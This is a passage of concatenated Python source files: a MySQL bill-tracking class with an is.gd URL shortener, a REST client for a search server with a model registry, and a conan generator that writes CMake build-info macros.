        False (posted), matching the original per-call fallbacks.
        """
        return (
            info['type'],
            info['number'],
            info['sponsor'],
            info['title'],
            info['full_url'],
            info.get('short_url'),
            info['introduced'],
            info.get('updated'),
            info.get('posted', False)
        )

    def query_fetchmany(self, query, args):
        """Fetches several rows from database based on query.

        Args:
            query: String with MySQL query.
            args: Tuple of arguments for the query.

        Returns:
            A list of database rows if they were fetched.
            If no rows were fetched, an empty list is returned.

        Raises:
            Exception: Errors in args or in query execution.
        """
        def iter_row(size=10):
            # Stream results in small batches rather than loading the
            # entire result set in one fetch.
            while True:
                rows = self.cursor.fetchmany(size)
                if not rows:
                    break
                for row in rows:
                    yield row

        if not isinstance(self.cursor, MySQLCursor):
            raise Exception('No database connection!')
        if not isinstance(query, self._STRING_TYPES):
            raise Exception('Invalid query string!')
        if not isinstance(args, tuple):
            raise Exception('Invalid query args!')
        rows = []
        try:
            self.cursor.execute(query, args)
            rows = list(iter_row())
        except Error as e:
            raise Exception(e)
        return rows

    def insert_row(self, info):
        """Inserts a new row into the database.

        Args:
            info: Dict containing row information.

        Returns:
            A boolean value. True means the insertion was successful.
            False means the insertion failed.

        Raises:
            Exception: Errors with args or insertion.
        """
        if not isinstance(self.cursor, MySQLCursor):
            raise Exception('No database connection!')
        if not isinstance(info, dict):
            raise Exception('Input must be a dict!')
        self._check_required(info, self._REQUIRED_KEYS)
        query = 'insert into bills(type, number, sponsor, title, full_url, short_url, introduced, updated, posted) ' \
                'values(%s, %s, %s, %s, %s, %s, %s, %s, %s)'
        args = self._row_args(info)
        result = False
        try:
            self.cursor.execute(query, args)
            if self.cursor.rowcount > 0:
                result = True
                self.conn.commit()
        except Error as e:
            raise Exception(e)
        return result

    def row_exists(self, info):
        """Determines if a row already exists in the database.

        Args:
            info: Dict containing relevant row data.

        Returns:
            An integer with the row's `id` (as stored in the database)
            if the row exists. None value if no row found.

        Raises:
            Exception: Error in the args or executing the query.
        """
        if not isinstance(self.cursor, MySQLCursor):
            raise Exception('No database connection!')
        if not isinstance(info, dict):
            raise Exception('Input must be a dict!')
        self._check_required(info, ('type', 'number'))
        query = 'select id, type, number from bills where type=%s and number=%s'
        args = (info['type'], info['number'])
        row = None
        try:
            self.cursor.execute(query, args)
            row = self.cursor.fetchone()
        except Error as e:
            raise Exception(e)
        return row[0] if row else None

    def update_row(self, row_id, info):
        """Updates a row in the table.

        Args:
            row_id: Integer representing `id` in table row.
            info: Dict containing new data.

        Returns:
            A boolean value. True means successful update.
            False means there was a failure.

        Raises:
            Exception: Error in the args or the query execution.
        """
        if not isinstance(self.cursor, MySQLCursor):
            raise Exception('No database connection!')
        if not isinstance(row_id, int) or row_id < 1:
            raise Exception('Invalid row ID!')
        if not isinstance(info, dict):
            raise Exception('Input must be a dict!')
        # Validate the same required keys as insert_row() so a malformed
        # dict fails with a clear message instead of a bare KeyError.
        self._check_required(info, self._REQUIRED_KEYS)
        query = """
        update bills
        set type = %s,
            number = %s,
            sponsor = %s,
            title = %s,
            full_url = %s,
            short_url = %s,
            introduced = %s,
            updated = %s,
            posted = %s
        where id = %s
        """
        args = self._row_args(info) + (row_id,)
        try:
            self.cursor.execute(query, args)
            if self.cursor.rowcount > 0:
                self.conn.commit()
                return True
        except Error as e:
            raise Exception(e)
        return False

    def has_been_posted(self, row_id):
        """Determines if a given row has `posted` set to True.

        Args:
            row_id: Integer representing `id` of a table row.

        Returns:
            The stored value in `posted` (represented as an integer),
            or False when the row is not found.

        Raises:
            Exception: Error in the args or the query execution.
        """
        if not isinstance(self.cursor, MySQLCursor):
            raise Exception('No database connection!')
        if not isinstance(row_id, int) or row_id < 1:
            raise Exception('Invalid row ID!')
        query = 'select posted from bills where id=%s'
        args = (row_id,)
        row = None
        try:
            self.cursor.execute(query, args)
            row = self.cursor.fetchone()
        except Error as e:
            raise Exception(e)
        return row[0] if row else False

    def isgd_shorten(self, url):
        """Shortens a URL using the is.gd API.

        Args:
            url: The URL to shorten (as a string).

        Returns:
            A string of the shortened URL on successful shortening.
            None value on failure.

        Raises:
            Exception: Failure stemming from the is.gd API.
        """
        data = {'format': 'json',
                'url': url,
                'logstats': 0}
        headers = {'user-agent': 'Mozilla/5.0 (compatible; Python Module)'}
        r = self.session.post('http://is.gd/create.php', params=data, headers=headers)
        if r.status_code == requests.codes.ok:
            d = r.json()
            if 'shorturl' in d:
                self.isgdquota += 1
                return d['shorturl']
            else:
                # Any API error response is treated as quota exhaustion so
                # no further requests are attempted this run.
                self.isgdquota = self.ISGD_RATE_LIMIT
                raise Exception('{0}: {1}'.format(d['errorcode'], d['errormessage']))
        return None

    def gen_short_url(self, row=None):
        """Shortens a row's URL.

        Args:
            row: Tuple object representing a table row.

        Raises:
            Exception: Failure to shorten URL.
        """
        if not isinstance(self.cursor, MySQLCursor):
            raise Exception('No database connection!')
        if not isinstance(row, tuple):
            raise Exception('Input must be a tuple!')
        if row and self.isgdquota < self.ISGD_RATE_LIMIT:
            info = self.tuple_to_dict(row)
            short_url = None
            try:
                short_url = self.isgd_shorten(info['full_url'])
                info['short_url'] = short_url
            except Exception as e:
                raise Exception(e)
            finally:
                # Persist the shortened URL even if a later error occurs.
                if short_url:
                    self.update_row(info['id'], info)

    def rows_to_shorten(self):
        """Returns a list of rows whose URLs need to be shortened.

        Returns:
            List of rows (in tuple representation) or empty
            list if no rows found.

        Raises:
            Exception: Failure in query execution.
        """
        query = 'select * from bills where isnull(short_url)'
        args = ()
        result = []
        try:
            result = self.query_fetchmany(query, args)
        except Exception as e:
            raise Exception(e)
        return result

    def tuple_to_dict(self, t):
        """Converts a row tuple to a dict keyed by the table's columns."""
        if not isinstance(t, tuple):
            raise Exception('Input must be a tuple!')
        keys = ['id',
                'type',
                'number',
                'sponsor',
                'title',
                'full_url',
                'short_url',
                'introduced',
                'updated',
                'posted']
        return dict(zip(keys, t))

    def get_table_size(self):
        """Calculates number of rows in the database table.

        Returns:
            0 by default. Otherwise, integer representing
            number of rows in the table.

        Raises:
            Exception: Error in query execution.
        """
        query = 'select count(*) from bills'
        result = 0
        try:
            self.cursor.execute(query)
            result = self.cursor.fetchone()[0]
        except Error as e:
            raise Exception(e)
        return result

    def get_row_to_post(self):
        """Gets a row to be tweeted out.

        Returns:
            A tuple containing row data (oldest unposted bill that
            already has a short URL), or None if nothing qualifies.

        Raises:
            Exception: Error in query execution.
        """
        query = 'select * from bills where !isnull(short_url) and posted=0 order by introduced asc'
        row = None
        try:
            self.cursor.execute(query)
            row = self.cursor.fetchone()
        except Error as e:
            raise Exception(e)
        return row
| |
import base64
import json
try:
from email.generator import _make_boundary as choose_boundary
except ImportError:
from mimetools import choose_boundary
import mimetypes
import os
try:
from urllib.parse import urlencode
except ImportError:
from urllib import urlencode
try:
from urllib.request import Request
from urllib.request import urlopen
except ImportError:
from urllib2 import Request
from urllib2 import urlopen
import zlib
ENDPOINT = None
KEY = None
class Scout(object):
    """Thin HTTP client for a scout search server's REST API.

    Wraps the server's index, document and attachment endpoints using
    urllib. When `key` is set it is sent as a `key` header on every
    request.
    """

    def __init__(self, endpoint=ENDPOINT, key=KEY):
        # NOTE(review): the module-level ENDPOINT default is None, so a
        # real endpoint string must be supplied or rstrip() will fail.
        self.endpoint = endpoint.rstrip('/')
        self.key = key

    def get_full_url(self, url):
        """Joins the configured endpoint with a request path."""
        return self.endpoint + url

    def get_raw(self, url, **kwargs):
        """Performs a GET request and returns the raw response body."""
        headers = {'Content-Type': 'application/json'}
        if self.key:
            headers['key'] = self.key
        if kwargs:
            # NOTE(review): if `url` already contains '?', extra params
            # are appended without a separating '&' -- confirm callers
            # never pass such a URL.
            if '?' not in url:
                url += '?'
            url += urlencode(kwargs, True)  # True -> doseq: expand lists
        request = Request(self.get_full_url(url), headers=headers)
        fh = urlopen(request)
        return fh.read()

    def get(self, url, **kwargs):
        """Performs a GET request and decodes the JSON response."""
        return json.loads(self.get_raw(url, **kwargs))

    def post(self, url, data=None, files=None):
        """POSTs `data`; multipart when `files` is given, JSON otherwise."""
        if files:
            return self.post_files(url, data, files)
        else:
            return self.post_json(url, data)

    def post_json(self, url, data=None):
        """POSTs `data` as a JSON body and decodes the JSON response."""
        headers = {'Content-Type': 'application/json'}
        if self.key:
            headers['key'] = self.key
        data = json.dumps(data or {})
        if not isinstance(data, bytes):
            data = data.encode('utf-8')
        request = Request(self.get_full_url(url), data=data, headers=headers)
        return json.loads(urlopen(request).read().decode('utf8'))

    def post_files(self, url, json_data, files=None):
        """POSTs `json_data` plus `files` as a multipart/form-data body.

        Args:
            json_data: payload serialized into the form's "data" field.
            files: dict mapping filename -> file-like object (or a value
                convertible with bytes()).
        """
        if not files or not isinstance(files, dict):
            raise ValueError('One or more files is required. Files should be '
                             'passed as a dictionary of filename: file-like-'
                             'object.')
        boundary = choose_boundary()
        form_files = []
        for i, (filename, file_obj) in enumerate(files.items()):
            try:
                data = file_obj.read()
            except AttributeError:
                # Not file-like; treat the value as raw bytes.
                data = bytes(file_obj)
            mimetype = mimetypes.guess_type(filename)[0]
            form_files.append((
                'file_%s' % i,
                filename,
                mimetype or 'application/octet-stream',
                data))
        part_boundary = '--' + boundary
        parts = [
            part_boundary,
            'Content-Disposition: form-data; name="data"',
            '',
            json.dumps(json_data)]
        for field_name, filename, mimetype, data in form_files:
            parts.extend((
                part_boundary,
                'Content-Disposition: file; name="%s"; filename="%s"' % (
                    field_name, filename),
                'Content-Type: %s' % mimetype,
                '',
                data))
        parts.append('--' + boundary + '--')
        parts.append('')
        headers = {'Content-Type': 'multipart/form-data; boundary=%s' %
                   boundary}
        if self.key:
            headers['key'] = self.key
        # NOTE(review): joining str parts with binary attachment data
        # raises TypeError on Python 3; presumably Python 2 or text-only
        # attachments are assumed -- verify before relying on binary uploads.
        data = '\r\n'.join(parts)
        if not isinstance(data, bytes):
            data = data.encode('utf-8')
        request = Request(self.get_full_url(url), data=data, headers=headers)
        return json.loads(urlopen(request).read())

    def delete(self, url):
        """Performs a DELETE request and decodes the JSON response."""
        headers = {}
        if self.key:
            headers['key'] = self.key
        request = Request(self.get_full_url(url), headers=headers)
        # urllib's Request has no native DELETE support; override the verb.
        request.get_method = lambda: 'DELETE'
        fh = urlopen(request)
        return json.loads(fh.read())

    def get_indexes(self, **kwargs):
        """Lists the indexes defined on the server."""
        return self.get('/', **kwargs)['indexes']

    def create_index(self, name):
        """Creates a new index."""
        return self.post('/', {'name': name})

    def rename_index(self, old_name, new_name):
        """Renames an existing index."""
        return self.post('/%s/' % old_name, {'name': new_name})

    def delete_index(self, name):
        """Deletes an index."""
        return self.delete('/%s/' % name)

    def get_index(self, name, **kwargs):
        """Fetches a single index's details."""
        return self.get('/%s/' % name, **kwargs)

    def get_documents(self, **kwargs):
        """Lists/searches documents."""
        return self.get('/documents/', **kwargs)

    def create_document(self, content, indexes, identifier=None,
                        attachments=None, **metadata):
        """Stores a document in one or more indexes.

        Extra keyword arguments are stored as document metadata; a single
        index may be passed without wrapping it in a list.
        """
        if not isinstance(indexes, (list, tuple)):
            indexes = [indexes]
        post_data = {
            'content': content,
            'identifier': identifier,
            'indexes': indexes,
            'metadata': metadata}
        return self.post('/documents/', post_data, attachments)

    def update_document(self, document_id=None, content=None, indexes=None,
                        metadata=None, identifier=None, attachments=None):
        """Updates content/indexes/metadata/attachments of a document."""
        if not document_id and not identifier:
            raise ValueError('`document_id` must be provided.')
        # NOTE(review): when only `identifier` is supplied, the URL below
        # is still built from `document_id` (None) -- confirm intended.
        data = {}
        if content is not None:
            data['content'] = content
        if indexes is not None:
            if not isinstance(indexes, (list, tuple)):
                indexes = [indexes]
            data['indexes'] = indexes
        if metadata is not None:
            data['metadata'] = metadata
        if not data and not attachments:
            raise ValueError('Nothing to update.')
        return self.post('/documents/%s/' % document_id, data, attachments)

    def delete_document(self, document_id=None):
        """Deletes a document by id."""
        if not document_id:
            raise ValueError('`document_id` must be provided.')
        return self.delete('/documents/%s/' % document_id)

    def get_document(self, document_id=None):
        """Fetches a document by id."""
        if not document_id:
            raise ValueError('`document_id` must be provided.')
        return self.get('/documents/%s/' % document_id)

    def attach_files(self, document_id, attachments):
        """Attaches files to an existing document."""
        return self.post_files('/documents/%s/attachments/' % document_id,
                               {}, attachments)

    def detach_file(self, document_id, filename):
        """Removes a single attachment from a document."""
        return self.delete('/documents/%s/attachments/%s/' %
                           (document_id, filename))

    def update_file(self, document_id, filename, file_object):
        """Replaces the content of an existing attachment."""
        return self.post_files('/documents/%s/attachments/%s/' %
                               (document_id, filename),
                               {}, {filename: file_object})

    def get_attachments(self, document_id, **kwargs):
        """Lists a document's attachments."""
        return self.get('/documents/%s/attachments/' % document_id, **kwargs)

    def get_attachment(self, document_id, filename):
        """Fetches metadata for a single attachment."""
        return self.get('/documents/%s/attachments/%s/' %
                        (document_id, filename))

    def download_attachment(self, document_id, filename):
        """Downloads an attachment's raw content."""
        return self.get_raw('/documents/%s/attachments/%s/download/' %
                            (document_id, filename))

    def search_attachments(self, **kwargs):
        """Searches across all documents' attachments."""
        return self.get('/documents/attachments/', **kwargs)
class SearchProvider(object):
    """Abstract adapter describing how to index one model type."""

    def content(self, obj):
        """Return the searchable text for *obj* (required)."""
        raise NotImplementedError

    def identifier(self, obj):
        """Return a unique identifier for *obj* (optional)."""
        raise NotImplementedError

    def metadata(self, obj):
        """Return a metadata dict for *obj* (optional)."""
        raise NotImplementedError
class SearchSite(object):
    """Registry mapping model classes to their SearchProvider instances."""

    def __init__(self, client, index):
        self.client = client
        self.index = index
        self.registry = {}

    def register(self, model_class, search_provider):
        """Instantiate *search_provider* and attach it to *model_class*."""
        providers = self.registry.setdefault(model_class, [])
        providers.append(search_provider())

    def unregister(self, model_class, search_provider=None):
        """Remove all providers, or only instances of one provider class."""
        if search_provider is None:
            self.registry.pop(model_class, None)
            return
        if model_class not in self.registry:
            return
        remaining = [provider for provider in self.registry[model_class]
                     if not isinstance(provider, search_provider)]
        self.registry[model_class] = remaining

    def store(self, obj):
        """Index *obj* once per registered provider for its type."""
        providers = self.registry.get(type(obj))
        if providers is None:
            return False
        for provider in providers:
            content = provider.content(obj)
            try:
                metadata = provider.metadata(obj)
            except NotImplementedError:
                metadata = {}
            try:
                metadata['identifier'] = provider.identifier(obj)
            except NotImplementedError:
                pass
            self.client.create_document(content, self.index, **metadata)
        return True

    def remove(self, obj):
        """Delete every indexed document for *obj*."""
        providers = self.registry.get(type(obj))
        if providers is None:
            return False
        for provider in providers:
            self.client.delete_document(provider.identifier(obj))
        return True
| |
from conans.model import Generator
from conans.paths import BUILD_INFO_CMAKE
class DepsCppCmake(object):
    """Pre-formats a conan deps_cpp_info object as CMake-ready strings."""

    def __init__(self, deps_cpp_info):
        def quoted_paths(paths):
            # Each path quoted, forward slashes, one per (tab-indented) line.
            return "\n\t\t\t".join('"%s"' % path.replace("\\", "/")
                                   for path in paths)

        self.include_paths = quoted_paths(deps_cpp_info.include_paths)
        self.lib_paths = quoted_paths(deps_cpp_info.lib_paths)
        self.bin_paths = quoted_paths(deps_cpp_info.bin_paths)
        self.libs = " ".join(deps_cpp_info.libs)
        self.defines = "\n\t\t\t".join("-D%s" % define
                                       for define in deps_cpp_info.defines)
        # Same list as `defines` but without the -D prefix, for targets.
        self.compile_definitions = "\n\t\t\t".join(deps_cpp_info.defines)
        self.cppflags = " ".join(deps_cpp_info.cppflags)
        self.cflags = " ".join(deps_cpp_info.cflags)
        self.sharedlinkflags = " ".join(deps_cpp_info.sharedlinkflags)
        self.exelinkflags = " ".join(deps_cpp_info.exelinkflags)
        self.rootpath = '"%s"' % deps_cpp_info.rootpath.replace("\\", "/")
class CMakeGenerator(Generator):
    @property
    def filename(self):
        """Name of the generated file (conans.paths.BUILD_INFO_CMAKE)."""
        return BUILD_INFO_CMAKE
    @property
    def content(self):
        """Assembles the generated cmake build-info text.

        Sections, in order: per-dependency CONAN_* variables, globally
        aggregated variables, a macro defining CONAN_PKG:: imported
        targets, and the generic setup macros.
        """
        sections = []
        # DEPS VARIABLES
        # One block of variables per dependency, suffixed with the
        # upper-cased dependency name.
        template_dep = ('set(CONAN_{dep}_ROOT {deps.rootpath})\n'
                        'set(CONAN_INCLUDE_DIRS_{dep} {deps.include_paths})\n'
                        'set(CONAN_LIB_DIRS_{dep} {deps.lib_paths})\n'
                        'set(CONAN_BIN_DIRS_{dep} {deps.bin_paths})\n'
                        'set(CONAN_LIBS_{dep} {deps.libs})\n'
                        'set(CONAN_DEFINES_{dep} {deps.defines})\n'
                        '# COMPILE_DEFINITIONS are equal to CONAN_DEFINES without -D, for targets\n'
                        'set(CONAN_COMPILE_DEFINITIONS_{dep} {deps.compile_definitions})\n'
                        'set(CONAN_CXX_FLAGS_{dep} "{deps.cppflags}")\n'
                        'set(CONAN_SHARED_LINKER_FLAGS_{dep} "{deps.sharedlinkflags}")\n'
                        'set(CONAN_EXE_LINKER_FLAGS_{dep} "{deps.exelinkflags}")\n'
                        'set(CONAN_C_FLAGS_{dep} "{deps.cflags}")\n')
        for dep_name, dep_cpp_info in self.deps_build_info.dependencies:
            deps = DepsCppCmake(dep_cpp_info)
            dep_flags = template_dep.format(dep=dep_name.upper(), deps=deps)
            sections.append(dep_flags)
        # GENERAL VARIABLES
        # Aggregated values prepend this build's entries to any CONAN_*
        # variables already defined in the including scope.
        deps = DepsCppCmake(self.deps_build_info)
        template = ('set(CONAN_PACKAGE_NAME {name})\n'
                    'set(CONAN_PACKAGE_VERSION {version})\n'
                    'set(CONAN_DEPENDENCIES {dependencies})\n'
                    'set(CONAN_INCLUDE_DIRS {deps.include_paths} ${{CONAN_INCLUDE_DIRS}})\n'
                    'set(CONAN_LIB_DIRS {deps.lib_paths} ${{CONAN_LIB_DIRS}})\n'
                    'set(CONAN_BIN_DIRS {deps.bin_paths} ${{CONAN_BIN_DIRS}})\n'
                    'set(CONAN_LIBS {deps.libs} ${{CONAN_LIBS}})\n'
                    'set(CONAN_DEFINES {deps.defines} ${{CONAN_DEFINES}})\n'
                    'set(CONAN_CXX_FLAGS "{deps.cppflags} ${{CONAN_CXX_FLAGS}}")\n'
                    'set(CONAN_SHARED_LINKER_FLAGS "{deps.sharedlinkflags} ${{CONAN_SHARED_LINKER_FLAGS}}")\n'
                    'set(CONAN_EXE_LINKER_FLAGS "{deps.exelinkflags} ${{CONAN_EXE_LINKER_FLAGS}}")\n'
                    'set(CONAN_C_FLAGS "{deps.cflags} ${{CONAN_C_FLAGS}}")\n'
                    'set(CONAN_CMAKE_MODULE_PATH {module_paths} ${{CONAN_CMAKE_MODULE_PATH}})')
        # Dependency root folders double as CMake module search paths.
        rootpaths = [DepsCppCmake(dep_cpp_info).rootpath for _, dep_cpp_info
                     in self.deps_build_info.dependencies]
        module_paths = " ".join(rootpaths)
        all_flags = template.format(deps=deps, module_paths=module_paths,
                                    dependencies=" ".join(self.deps_build_info.deps),
                                    name=self.conanfile.name, version=self.conanfile.version)
        sections.append("\n### Definition of global aggregated variables ###\n")
        sections.append(all_flags)
        # TARGETS
        # Per-dependency INTERFACE IMPORTED target; libraries are resolved
        # to full paths where possible, falling back to the bare name for
        # system libraries.
        template = """
foreach(_LIBRARY_NAME ${{CONAN_LIBS_{uname}}})
unset(FOUND_LIBRARY CACHE)
find_library(FOUND_LIBRARY NAME ${{_LIBRARY_NAME}} PATHS ${{CONAN_LIB_DIRS_{uname}}} NO_DEFAULT_PATH)
if(FOUND_LIBRARY)
set(CONAN_FULLPATH_LIBS_{uname} ${{CONAN_FULLPATH_LIBS_{uname}}} ${{FOUND_LIBRARY}})
else()
message(STATUS "Library ${{_LIBRARY_NAME}} not found in package, might be system one")
set(CONAN_FULLPATH_LIBS_{uname} ${{CONAN_FULLPATH_LIBS_{uname}}} ${{_LIBRARY_NAME}})
endif()
endforeach()
add_library({name} INTERFACE IMPORTED)
set_property(TARGET {name} PROPERTY INTERFACE_LINK_LIBRARIES ${{CONAN_FULLPATH_LIBS_{uname}}} {deps})
set_property(TARGET {name} PROPERTY INTERFACE_INCLUDE_DIRECTORIES ${{CONAN_INCLUDE_DIRS_{uname}}})
set_property(TARGET {name} PROPERTY INTERFACE_COMPILE_DEFINITIONS ${{CONAN_COMPILE_DEFINITIONS_{uname}}})
set_property(TARGET {name} PROPERTY INTERFACE_COMPILE_OPTIONS ${{CONAN_CFLAGS_{uname}}} ${{CONAN_CXX_FLAGS_{uname}}})
set_property(TARGET {name} PROPERTY INTERFACE_LINK_FLAGS ${{CONAN_SHARED_LINKER_FLAGS_{uname}}} ${{CONAN_EXE_LINKER_FLAGS_{uname}}})
"""
        existing_deps = self.deps_build_info.deps
        sections.append("\n### Definition of macros and functions ###\n")
        sections.append('macro(conan_define_targets)\n'
                        '    if(${CMAKE_VERSION} VERSION_LESS "3.1.2")\n'
                        '        message(FATAL_ERROR "TARGETS not supported by your CMake version!")\n'
                        '    endif()  # CMAKE > 3.x\n')
        for dep_name, dep_info in self.deps_build_info.dependencies:
            # Only link against CONAN_PKG targets that actually exist.
            use_deps = ["CONAN_PKG::%s" % d for d in dep_info.deps if d in existing_deps]
            deps = "" if not use_deps else " ".join(use_deps)
            sections.append(template.format(name="CONAN_PKG::%s" % dep_name, deps=deps,
                                            uname=dep_name.upper()))
        sections.append('endmacro()\n')
        # MACROS
        sections.append(self._aux_cmake_test_setup())
        return "\n".join(sections)
def _aux_cmake_test_setup(self):
    """Return the static helper section of the generated conanbuildinfo.cmake.

    The returned text is emitted verbatim into the generated file.  It defines
    the conan_basic_setup() entry point plus the macros/functions it dispatches
    to: output-dir setup, global include/lib/flag configuration, Visual Studio
    runtime substitution (/MD -> CONAN_LINK_RUNTIME), libcxx flags, macOS rpath
    handling, and compiler/version consistency checks against conaninfo.txt.
    The string content is CMake code, not Python, and must not be altered.
    """
    return """macro(conan_basic_setup)
conan_check_compiler()
conan_output_dirs_setup()
conan_set_find_library_paths()
if(NOT "${ARGV0}" STREQUAL "TARGETS")
message(STATUS "Conan: Using cmake global configuration")
conan_global_flags()
else()
message(STATUS "Conan: Using cmake targets configuration")
conan_define_targets()
endif()
conan_set_rpath()
conan_set_vs_runtime()
conan_set_libcxx()
conan_set_find_paths()
endmacro()
macro(conan_set_find_paths)
# CMake can find findXXX.cmake files in the root of packages
set(CMAKE_MODULE_PATH ${CONAN_CMAKE_MODULE_PATH} ${CMAKE_MODULE_PATH})
# Make find_package() to work
set(CMAKE_PREFIX_PATH ${CONAN_CMAKE_MODULE_PATH} ${CMAKE_PREFIX_PATH})
endmacro()
macro(conan_set_find_library_paths)
# For find_library
set(CMAKE_INCLUDE_PATH ${CONAN_INCLUDE_DIRS} ${CMAKE_INCLUDE_PATH})
set(CMAKE_LIBRARY_PATH ${CONAN_LIB_DIRS} ${CMAKE_LIBRARY_PATH})
endmacro()
macro(conan_set_vs_runtime)
if(CONAN_LINK_RUNTIME)
if(DEFINED CMAKE_CXX_FLAGS_RELEASE)
string(REPLACE "/MD" ${CONAN_LINK_RUNTIME} CMAKE_CXX_FLAGS_RELEASE ${CMAKE_CXX_FLAGS_RELEASE})
endif()
if(DEFINED CMAKE_CXX_FLAGS_DEBUG)
string(REPLACE "/MDd" ${CONAN_LINK_RUNTIME} CMAKE_CXX_FLAGS_DEBUG ${CMAKE_CXX_FLAGS_DEBUG})
endif()
if(DEFINED CMAKE_C_FLAGS_RELEASE)
string(REPLACE "/MD" ${CONAN_LINK_RUNTIME} CMAKE_C_FLAGS_RELEASE ${CMAKE_C_FLAGS_RELEASE})
endif()
if(DEFINED CMAKE_C_FLAGS_DEBUG)
string(REPLACE "/MDd" ${CONAN_LINK_RUNTIME} CMAKE_C_FLAGS_DEBUG ${CMAKE_C_FLAGS_DEBUG})
endif()
endif()
endmacro()
macro(conan_set_libcxx)
if(DEFINED CONAN_LIBCXX)
message(STATUS "Conan C++ stdlib: ${CONAN_LIBCXX}")
if(CONAN_COMPILER STREQUAL "clang" OR CONAN_COMPILER STREQUAL "apple-clang")
if(CONAN_LIBCXX STREQUAL "libstdc++" OR CONAN_LIBCXX STREQUAL "libstdc++11" )
set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -stdlib=libstdc++")
elseif(CONAN_LIBCXX STREQUAL "libc++")
set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -stdlib=libc++")
endif()
endif()
if(CONAN_LIBCXX STREQUAL "libstdc++11")
add_definitions(-D_GLIBCXX_USE_CXX11_ABI=1)
elseif(CONAN_LIBCXX STREQUAL "libstdc++")
add_definitions(-D_GLIBCXX_USE_CXX11_ABI=0)
endif()
endif()
endmacro()
macro(conan_set_rpath)
if(APPLE)
# https://cmake.org/Wiki/CMake_RPATH_handling
# CONAN GUIDE: All generated libraries should have the id and dependencies to other
# dylibs without path, just the name, EX:
# libMyLib1.dylib:
# libMyLib1.dylib (compatibility version 0.0.0, current version 0.0.0)
# libMyLib0.dylib (compatibility version 0.0.0, current version 0.0.0)
# /usr/lib/libc++.1.dylib (compatibility version 1.0.0, current version 120.0.0)
# /usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 1197.1.1)
set(CMAKE_SKIP_RPATH 1) # AVOID RPATH FOR *.dylib, ALL LIBS BETWEEN THEM AND THE EXE
# SHOULD BE ON THE LINKER RESOLVER PATH (./ IS ONE OF THEM)
endif()
endmacro()
macro(conan_global_flags)
if(CONAN_SYSTEM_INCLUDES)
include_directories(SYSTEM ${CONAN_INCLUDE_DIRS})
else()
include_directories(${CONAN_INCLUDE_DIRS})
endif()
link_directories(${CONAN_LIB_DIRS})
add_definitions(${CONAN_DEFINES})
set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} ${CONAN_CXX_FLAGS}")
set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} ${CONAN_C_FLAGS}")
set(CMAKE_SHARED_LINKER_FLAGS "${CMAKE_SHARED_LINKER_FLAGS} ${CONAN_SHARED_LINKER_FLAGS}")
set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} ${CONAN_EXE_LINKER_FLAGS}")
endmacro()
macro(conan_flags_setup)
# Macro maintained for backwards compatibility
conan_set_find_library_paths()
conan_global_flags()
conan_set_rpath()
conan_set_vs_runtime()
conan_set_libcxx()
endmacro()
macro(conan_output_dirs_setup)
set(CMAKE_RUNTIME_OUTPUT_DIRECTORY ${CMAKE_CURRENT_BINARY_DIR}/bin)
set(CMAKE_RUNTIME_OUTPUT_DIRECTORY_RELEASE ${CMAKE_RUNTIME_OUTPUT_DIRECTORY})
set(CMAKE_RUNTIME_OUTPUT_DIRECTORY_DEBUG ${CMAKE_RUNTIME_OUTPUT_DIRECTORY})
set(CMAKE_ARCHIVE_OUTPUT_DIRECTORY ${CMAKE_CURRENT_BINARY_DIR}/lib)
set(CMAKE_ARCHIVE_OUTPUT_DIRECTORY_RELEASE ${CMAKE_ARCHIVE_OUTPUT_DIRECTORY})
set(CMAKE_ARCHIVE_OUTPUT_DIRECTORY_DEBUG ${CMAKE_ARCHIVE_OUTPUT_DIRECTORY})
endmacro()
macro(conan_split_version VERSION_STRING MAJOR MINOR)
#make a list from the version string
string(REPLACE "." ";" VERSION_LIST ${${VERSION_STRING}})
#write output values
list(GET VERSION_LIST 0 ${MAJOR})
list(GET VERSION_LIST 1 ${MINOR})
endmacro()
macro(conan_error_compiler_version)
message(FATAL_ERROR "Incorrect '${CONAN_COMPILER}' version 'compiler.version=${CONAN_COMPILER_VERSION}'"
" is not the one detected by CMake: '${CMAKE_CXX_COMPILER_ID}=" ${VERSION_MAJOR}.${VERSION_MINOR}')
endmacro()
set(_CONAN_CURRENT_DIR ${CMAKE_CURRENT_LIST_DIR})
function(conan_get_compiler CONAN_INFO_COMPILER CONAN_INFO_COMPILER_VERSION)
MESSAGE(STATUS "Current conanbuildinfo.cmake directory: " ${_CONAN_CURRENT_DIR})
if(NOT EXISTS ${_CONAN_CURRENT_DIR}/conaninfo.txt)
message(STATUS "WARN: conaninfo.txt not found")
return()
endif()
file (READ "${_CONAN_CURRENT_DIR}/conaninfo.txt" CONANINFO)
string(REGEX MATCH "compiler=([A-Za-z0-9_ ]+)" _MATCHED ${CONANINFO})
if(DEFINED CMAKE_MATCH_1)
string(STRIP ${CMAKE_MATCH_1} _CONAN_INFO_COMPILER)
set(${CONAN_INFO_COMPILER} ${_CONAN_INFO_COMPILER} PARENT_SCOPE)
endif()
string(REGEX MATCH "compiler.version=([-A-Za-z0-9_.]+)" _MATCHED ${CONANINFO})
if(DEFINED CMAKE_MATCH_1)
string(STRIP ${CMAKE_MATCH_1} _CONAN_INFO_COMPILER_VERSION)
set(${CONAN_INFO_COMPILER_VERSION} ${_CONAN_INFO_COMPILER_VERSION} PARENT_SCOPE)
endif()
endfunction()
function(check_compiler_version)
CONAN_SPLIT_VERSION(CMAKE_CXX_COMPILER_VERSION VERSION_MAJOR VERSION_MINOR)
if(CMAKE_CXX_COMPILER_ID MATCHES MSVC)
# https://cmake.org/cmake/help/v3.2/variable/MSVC_VERSION.html
if( (CONAN_COMPILER_VERSION STREQUAL "14" AND NOT VERSION_MAJOR STREQUAL "19") OR
(CONAN_COMPILER_VERSION STREQUAL "12" AND NOT VERSION_MAJOR STREQUAL "18") OR
(CONAN_COMPILER_VERSION STREQUAL "11" AND NOT VERSION_MAJOR STREQUAL "17") OR
(CONAN_COMPILER_VERSION STREQUAL "10" AND NOT VERSION_MAJOR STREQUAL "16") OR
(CONAN_COMPILER_VERSION STREQUAL "9" AND NOT VERSION_MAJOR STREQUAL "15") OR
(CONAN_COMPILER_VERSION STREQUAL "8" AND NOT VERSION_MAJOR STREQUAL "14") OR
(CONAN_COMPILER_VERSION STREQUAL "7" AND NOT VERSION_MAJOR STREQUAL "13") OR
